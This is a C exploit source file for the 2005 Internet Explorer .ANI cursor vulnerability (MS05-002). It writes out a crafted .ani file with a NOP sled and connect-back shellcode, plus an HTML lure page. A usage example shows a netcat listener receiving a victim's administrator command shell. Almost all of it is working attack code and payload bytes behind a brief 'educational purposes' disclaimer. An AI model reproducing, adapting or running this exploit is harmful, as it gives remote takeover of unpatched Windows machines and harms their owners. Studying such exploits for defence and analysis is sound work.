/* WC-ms05002-ani-expl-cb.c: 2005-01-30: PUBLIC v.0.2 
 * 
 * Copyright (c) 2004-2005 WhiskyCoders. 
 * 
 * (MS05-002) Microsoft Internet Explorer .ANI Files Handling Exploit 
 * (CAN-2004-1049) 
 * 
 * WhiskyCoders - http://bennupg.ath.cx
 * Greetz: nitrous, kubaner, cryogen, rowter, dex, beck, and everyone else in the vulnfact.com crew
 * 
 * (universal -- for all affected systems) 
 * --------------------------------------------------------------------- 
 * Notes:
 *    This is a mod of houseofdabus (HOD-ms05002-ani-expl.c) exploit.
 *    http://www.k-otik.com/exploits/20050123.HOD-ms05002-ani-expl.c.php
 * --------------------------------------------------------------------- 
 * Description: 
 *    A remote code execution vulnerability exists in the way that 
 *    cursor, animated cursor, and icon formats are handled. An attacker 
 *    could try to exploit the vulnerability by constructing a malicious 
 *    cursor or icon file that could potentially allow remote code 
 *    execution if a user visited a malicious Web site or viewed a 
 *    malicious e-mail message. An attacker who successfully exploited 
 *    this vulnerability could take complete control of an affected 
 *    system. 
 * 
 * --------------------------------------------------------------------- 
 * Patch: 
 *    http://www.microsoft.com/technet/security/Bulletin/MS05-002.mspx 
 * 
 * --------------------------------------------------------------------- 
 * Tested on: 
 *    - Windows Server 2003 
 *    - Windows XP SP1 
 *    - Windows XP SP0 
 *    - Windows 2000 SP4 
 *    - Windows 2000 SP3 
 *    - Windows 2000 SP2 
 * 
 * --------------------------------------------------------------------- 
 * Compile: 
 * 
 * Win32/VC++  : cl -o WC-ms05002-ani-expl-cb WC-ms05002-ani-expl-cb.c 
 * Win32/cygwin: gcc -o WC-ms05002-ani-expl-cb WC-ms05002-ani-expl-cb.c 
 * Linux       : gcc -o WC-ms05002-ani-expl-cb WC-ms05002-ani-expl-cb.c 
 * 
 * --------------------------------------------------------------------- 
 * Example: 
 * 
 **ATTACKER:
 *
 * d00d@whiskybox $ WC-ms05002-ani-expl-cb poc 7778 192.168.0.30
 * <...> 
 * [*] Creating poc.ani file ... Ok 
 * [*] Creating poc.html file ... Ok 
 * 
 * d00d@whiskybox $ netcat -l -p 7778 -v
 *
 **VICTIM:
 *
 * C:\> iexplore C:\poc.html 
 * 
 **ATTACKER:
 * d00d@whiskybox $ netcat -l -p 7778 -v
 * Microsoft Windows 2000 [Version 5.00.2195] 
 * (C) Copyright 1985-2000 Microsoft Corp. 
 * 
 * C:\Documents and Settings\Administrator\Desktop> 
 * 
 * --------------------------------------------------------------------- 
 * 
 *   This is provided as proof-of-concept code only for educational 
 *   purposes and testing by authorized individuals with permission to 
 *   do so. 
 * 
 */ 
 
#include <stdio.h> 
#include <stdlib.h> 
 
 
/* ANI header */ 
unsigned char aniheader[] = 
"\x52\x49\x46\x46\x9c\x18\x00\x00\x41\x43\x4f\x4e\x61\x6e\x69\x68" 
"\x7c\x03\x00\x00\x24\x00\x00\x00\x08\x00\x00\x00\x08\x00\x00\x00" 
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" 
 
/* jmp offset, no Jitsu */ 
"\x77\x82\x40\x00\xeb\x64\x90\x90\x77\x82\x40\x00\xeb\x64\x90\x90" 
"\xeb\x54\x90\x90\x77\x82\x40\x00\xeb\x54\x90\x90\x77\x82\x40\x00" 
"\xeb\x44\x90\x90\x77\x82\x40\x00\xeb\x44\x90\x90\x77\x82\x40\x00" 
"\xeb\x34\x90\x90\x77\x82\x40\x00\xeb\x34\x90\x90\x77\x82\x40\x00" 
"\xeb\x24\x90\x90\x77\x82\x40\x00\xeb\x24\x90\x90\x77\x82\x40\x00" 
"\xeb\x14\x90\x90\x77\x82\x40\x00\xeb\x14\x90\x90\x77\x82\x40\x00" 
"\x77\x82\x40\x00\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90" 
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90" 
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90" 
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90" 
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"; 
 
 
/* connectback shellcode */ 
unsigned char shellcode[] = 
"\xeb\x70\x56\x33\xc0\x64\x8b\x40\x30\x85\xc0\x78\x0c\x8b\x40\x0c" 
"\x8b\x70\x1c\xad\x8b\x40\x08\xeb\x09\x8b\x40\x34\x8d\x40\x7c\x8b" 
"\x40\x3c\x5e\xc3\x60\x8b\x6c\x24\x24\x8b\x45\x3c\x8b\x54\x05\x78" 
"\x03\xd5\x8b\x4a\x18\x8b\x5a\x20\x03\xdd\xe3\x34\x49\x8b\x34\x8b" 
"\x03\xf5\x33\xff\x33\xc0\xfc\xac\x84\xc0\x74\x07\xc1\xcf\x0d\x03" 
"\xf8\xeb\xf4\x3b\x7c\x24\x28\x75\xe1\x8b\x5a\x24\x03\xdd\x66\x8b" 
"\x0c\x4b\x8b\x5a\x1c\x03\xdd\x8b\x04\x8b\x03\xc5\x89\x44\x24\x1c" 
"\x61\xc3\xeb\x35\xad\x50\x52\xe8\xa8\xff\xff\xff\x89\x07\x83\xc4" 
"\x08\x83\xc7\x04\x3b\xf1\x75\xec\xc3\x8e\x4e\x0e\xec\x72\xfe\xb3" 
"\x16\x7e\xd8\xe2\x73\xad\xd9\x05\xce\xd9\x09\xf5\xad\xec\xf9\xaa" 
"\x60\xcb\xed\xfc\x3b\xe7\x79\xc6\x79\x83\xec\x60\x8b\xec\xeb\x02" 
"\xeb\x05\xe8\xf9\xff\xff\xff\x5e\xe8\x45\xff\xff\xff\x8b\xd0\x83" 
"\xee\x2e\x8d\x7d\x04\x8b\xce\x83\xc1\x10\xe8\xa5\xff\xff\xff\x83" 
"\xc1\x10\x33\xc0\x66\xb8\x33\x32\x50\x68\x77\x73\x32\x5f\x8b\xdc" 
"\x51\x52\x53\xff\x55\x04\x5a\x59\x8b\xd0\xe8\x85\xff\xff\xff\xb8" 
"\x01\x63\x6d\x64\xc1\xf8\x08\x50\x89\x65\x30\x33\xc0\x66\xb8\x90" 
"\x01\x2b\xe0\x54\x83\xc0\x72\x50\xff\x55\x1c\x33\xc0\x50\x50\x50" 
"\x50\x40\x50\x40\x50\xff\x55\x14\x8b\xf0\x68\x7f\x01\x01\x01\xb8" 
"\x02\x01\x11\x5c\xfe\xcc\x50\x8b\xdc\x33\xc0\xb0\x10\x50\x53\x56" 
"\xff\x55\x18\x33\xc9\xb1\x54\x2b\xe1\x8b\xfc\x57\x33\xc0\xf3\xaa" 
"\x5f\xc6\x07\x44\xfe\x47\x2d\x57\x8b\xc6\x8d\x7f\x38\xab\xab\xab" 
"\x5f\x33\xc0\x8d\x77\x44\x56\x57\x50\x50\x50\x40\x50\x48\x50\x50" 
"\xff\x75\x30\x50\xff\x55\x08\xf7\xd0\x50\xff\x36\xff\x55\x10\xff" 
"\x77\x38\xff\x55\x20\xff\x55\x0c";

#define SET_CONNECTBACK_IP(buf, ip) *(unsigned long *)(((buf)+283)) = (ip) 
#define SET_CONNECTBACK_PORT(buf, port) *(unsigned short *)(((buf)+290)) = (port)  

unsigned char discl[] = 
"This is provided as proof-of-concept code only for educational" 
" purposes and testing by authorized individuals with permission" 
" to do so."; 
 
unsigned char html[] = 
"<html>\n" 
"(MS05-002) Microsoft Internet Explorer .ANI Files Handling 
Exploit" 
"<br>Copyright (c) 2004-2005 :: WhiskyCoders :: <br><a href 
=\"" 
"http://www.microsoft.com/technet/security/Bulletin/MS05-002.mspx\">" 
"Patch (MS05-002)</a>\n" 
"<script>alert(\"%s\")</script>\n<head>\n\t<style>\n" 
"\t\t* {CURSOR: url(\"%s.ani\")}\n\t</style>\n</head>\n" 
"</html>"; 
 
 
unsigned short 
fixx(unsigned short p) 
{ 
unsigned short r = 0; 
r  = (p & 0xFF00) >> 8; 
r |= (p & 0x00FF) << 8; 
 
return r; 
} 
 
void 
usage(char *prog) 
{ 
printf("Usage:\n"); 
printf("%s <file> <port> <ip>\n\n", prog); 
exit(0); 
} 
 
 
int 
main(int argc, char **argv) 
{ 
FILE *fp; 
unsigned short port; 
unsigned long backip = 0;
unsigned char f[256+5] = ""; 
unsigned char anib[912] = ""; 
 
 
printf("\n(MS05-002) Microsoft Internet Explorer .ANI Files Handling Exploit\n\n"); 
printf("\tCopyright (c) 2004-2005 :: WhiskyCoders :: \n\n\n"); 
printf("Tested on all affected systems:\n"); 
printf("   [+] Windows Server 2003\n   [+] Windows XP SP1, SP0\n"); 
printf("   [+] Windows 2000 All SP\n\n"); 
 
printf("%s\n\n", discl); 
if ( (sizeof(shellcode)-1) > (912-sizeof(aniheader)-3) ) { 
printf("[-] Size of shellcode must be <= 686 bytes\n"); 
return 0; 
} 
if (argc < 3) usage(argv[0]); 
 
if (strlen(argv[1]) > 256) { 
printf("[-] Size of filename must be <=256 bytes\n"); 
return 0; 
} 
 
/* creating ani file */ 
strcpy(f, argv[1]); 
strcat(f, ".ani"); 
printf("[*] Creating %s file ...", f); 
fp = fopen(f, "wb"); 
if (fp == NULL) { 
printf("\n[-] error: can\'t create file: %s\n", f); 
return 0; 
} 
memset(anib, 0x90, 912); 
 
/* header */ 
memcpy(anib, aniheader, sizeof(aniheader)-1);

/* shellcode */ 
port = atoi(argv[2]); 
SET_CONNECTBACK_PORT(shellcode, fixx(port)); 

backip = inet_addr(argv[3]); 
SET_CONNECTBACK_IP(shellcode, backip); 

memcpy(anib+sizeof(aniheader)-1, shellcode, sizeof(shellcode)-1); 
 
fwrite(anib, 1, 912, fp); 
printf(" Ok\n"); 
fclose(fp); 
 
/* creating html file */ 
f[0] = '\0'; 
strcpy(f, argv[1]); 
strcat(f, ".html"); 
printf("[*] Creating %s file ...", f); 
fp = fopen(f, "wb"); 
if (fp == NULL) { 
printf("\n[-] error: can\'t create file: %s\n", f); 
return 0; 
} 
sprintf(anib, html, discl, argv[1]); 
fwrite(anib, 1, strlen(anib), fp); 
printf(" Ok\n"); 
fclose(fp); 
 
return 0; 
}